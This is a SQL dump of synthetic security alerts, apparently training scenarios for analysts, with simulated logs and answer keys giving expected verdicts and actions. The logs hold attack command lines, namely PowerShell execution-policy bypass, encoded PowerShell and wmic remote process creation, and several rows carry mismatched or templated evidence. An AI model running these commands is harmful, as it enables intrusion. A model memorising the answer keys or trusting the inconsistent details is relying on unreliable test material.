(314, 'Port Scanning Detected from External Source', 'medium', 'Network', 'Multiple connection attempts on increasing port numbers were detected from an IP address not previously seen, suggesting a potential reconnaissance attempt.', 'Network Anomaly', 'T1046', 0, 'resolved', NULL, '{\"timestamp\":\"2023-10-14T13:47:08Z\",\"src_ip\":\"185.32.184.76\",\"src_port\":4723,\"dest_ip\":\"172.16.0.10\",\"dest_ports\":[22,23,80,443,8080],\"protocol\":\"TCP\",\"packet_count\":50,\"byte_count\":11000,\"user_agent\":\"Mozilla/5.0\",\"geo_location\":{\"country\":\"Germany\",\"city\":\"Frankfurt\"},\"additional_info\":{\"as_number\":12345,\"as_org\":\"Example ISP\"}}', '2026-01-02 13:35:26', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"221.191.155.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP 221.191.155.57 reported 235 times for malicious activity. Abuse confidence score: 89%.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service_account\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account shows multiple failed login attempts followed by successful authentication.\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"suspicious_activity\"}', 'Beginner', 'NDR', 1, 0, 'OT_ICS', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(315, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'WORKSTATION-01\'. The process has been linked to a known malware campaign targeting enterprise environments.', 'Malware', 'T1059', 1, 'Closed', 54, '{\"timestamp\":\"2026-01-02T10:23:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.2\",\"hostname\":\"WORKSTATION-01\",\"username\":\"jane.doe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_path\":\"C:\\\\Users\\\\jane.doe\\\\malware.exe\"}', '2026-01-02 11:44:27', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected as part of a well-known malware campaign.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.2\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Source IP is part of the internal network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a known malicious file indicates a real threat requiring immediate containment and investigation.\"}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 
Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(316, 'Phishing Attempt Detected via Malicious Email', 'medium', 'Proofpoint', 'An email containing a malicious URL was received by user \'john.smith\'. The URL is associated with credential harvesting attacks.', 'Phishing', 'T1566', 1, 'investigating', 300, '{\"timestamp\":\"2026-01-02T08:47:30Z\",\"event_type\":\"email_received\",\"email_sender\":\"no-reply@fakebank.com\",\"username\":\"john.smith\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-02 14:22:02', '2026-03-14 23:55:30', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"no-reply@fakebank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Email address is associated with recent phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL linked to phishing sites targeting user credentials.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to an internal employee.\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a malicious URL in an email suggests a phishing attack aimed at harvesting credentials.\"}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Attempt Detected via Malicious Email\",\"date\":\"2026-02-01T20:32:18.911Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(317, 'Suspicious Email Detected with Potential Phishing URL', 'medium', 'Proofpoint', 'An email was received from a suspicious sender with a URL known for phishing activities. The email appears to be a spoofed message attempting to trick users into clicking the malicious link.', 'Phishing', 'T1566', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-02T08:34:22Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.12\",\"email_sender\":\"noreply@alerting-service.com\",\"domain\":\"alerting-service.com\",\"url\":\"http://malicious-phishing-link.com\",\"username\":\"john.doe\",\"hostname\":\"johns-pc\"}', '2026-01-02 11:43:28', '2026-02-01 20:32:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.12\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 23 times for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"alerting-service.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No malicious activity detected\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-phishing-link.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with ongoing phishing campaign\"}}],\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The presence of a known malicious URL and reports of phishing from the IP suggest this is a true positive.\"}', 'Beginner', 'EDR', 1, 0, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected with Potential Phishing URL\",\"date\":\"2026-02-01T20:32:18.912Z\",\"x-mailer\":\"PHPMailer 
6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(318, 'Excessive Login Failures from Known Internal Host', 'low', 'Wazuh', 'Multiple failed login attempts were detected from an internal IP address. The activity was flagged due to a high number of failures, but the source is an internal, known host.', 'Brute Force', 'T1110', 0, 'Closed', 34, '{\"timestamp\":\"2026-01-02T09:15:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"admin\",\"hostname\":\"internal-server\",\"failed_attempts\":15}', '2026-01-02 19:25:21', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"Internal network address, no external reports\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"clean\",\"details\":\"Commonly used internal admin account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login failures originate from an internal IP address, indicating a potential misconfiguration or user error rather than a malicious attempt.\"}', 'Beginner', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:31:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:30:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:29:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"},{\"timestamp\":\"2026-02-01T20:28:18.913Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-02T09:15:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"internal-server\\\",\\\"failed_attempts\\\":15}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(319, 'Suspicious Email Detected', 'high', 'Email Gateway', 'APT10 begins the attack by sending spear-phishing emails to key employees of TechGlobal Inc., enticing them to click on a malicious link disguised as a legitimate business document.', 'Phishing', 'T1566.001', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-01T14:32:00Z\",\"email_id\":\"d3f4b5c6-7e89-4abc-de12-34567890fghj\",\"sender\":\"attacker@maliciousdomain.com\",\"recipient\":\"jane.doe@techglobal.com\",\"subject\":\"Important Business Document\",\"attachment\":\"Invoice_2023.pdf\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.45\",\"url\":\"http://maliciousdomain.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"smtp_server\":\"smtp.techglobal.com\"}', '2026-01-02 20:23:41', '2026-03-09 02:49:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Service\",\"verdict\":\"malicious\",\"details\":\"IP address involved in multiple phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Inspection Service\",\"verdict\":\"malicious\",\"details\":\"URL is associated with phishing 
activities.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Name Patterns\",\"verdict\":\"suspicious\",\"details\":\"Common filename used in phishing emails.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected\",\"date\":\"2026-02-01T20:32:18.914Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(320, 'Unauthorized Application Execution', 'high', 'EDR', 'Following successful credential harvesting, the attacker uses the compromised accounts to execute malware on the target network, enabling remote access and further exploitation.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:28:32Z\",\"event_id\":\"4624\",\"computer_name\":\"workstation-22.corp.local\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.57\",\"destination_ip\":\"10.0.0.45\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_name\":\"malicious_script.ps1\",\"action\":\"Create Process\"}', '2026-01-02 20:23:41', '2026-03-09 02:51:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(321, 'Persistence Mechanism Installed', 'high', 'Endpoint Security Logs', 'APT10 installed a persistence mechanism via registry modifications and scheduled tasks on the endpoint, ensuring continued access to the compromised systems. Detection of suspicious registry changes and scheduled tasks was noted.', 'Persistence', 'T1547', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-23T14:37:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.2.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"filename\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"RegistryModification\",\"user_sid\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"process_name\":\"regedit.exe\"}', '2026-01-02 20:23:41', '2026-03-09 02:54:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\ScheduledTaskMalware\",\"is_critical\":true,\"osint_result\":{\"source\":\"EndpointSecurity\",\"verdict\":\"malicious\",\"details\":\"Malicious scheduled task linked to persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware 
variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.916Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:37:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"filename\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\ScheduledTaskMalware\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"event_type\\\":\\\"RegistryModification\\\",\\\"user_sid\\\":\\\"S-1-5-21-3623811015-3361044348-30300820-1013\\\",\\\"process_name\\\":\\\"regedit.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(322, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With a foothold established, the attacker moves laterally within the network, using legitimate administrative tools to avoid detection while searching for valuable data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:25:36Z\",\"source_ip\":\"192.168.1.102\",\"destination_ip\":\"192.168.1.150\",\"external_attacker_ip\":\"203.0.113.45\",\"username\":\"admin_jdoe\",\"used_tool\":\"wmic\",\"command\":\"wmic /node:192.168.1.150 process call create \'cmd.exe /c whoami\'\",\"file_hash\":\"3f1d0f1e2a2b3c4d5e6f7a8b9c0d1e2f3g4h5i6j\",\"detected_protocol\":\"SMB\",\"log_type\":\"network_traffic\"}', '2026-01-02 20:23:41', '2026-03-09 02:57:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of potential compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.150\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous 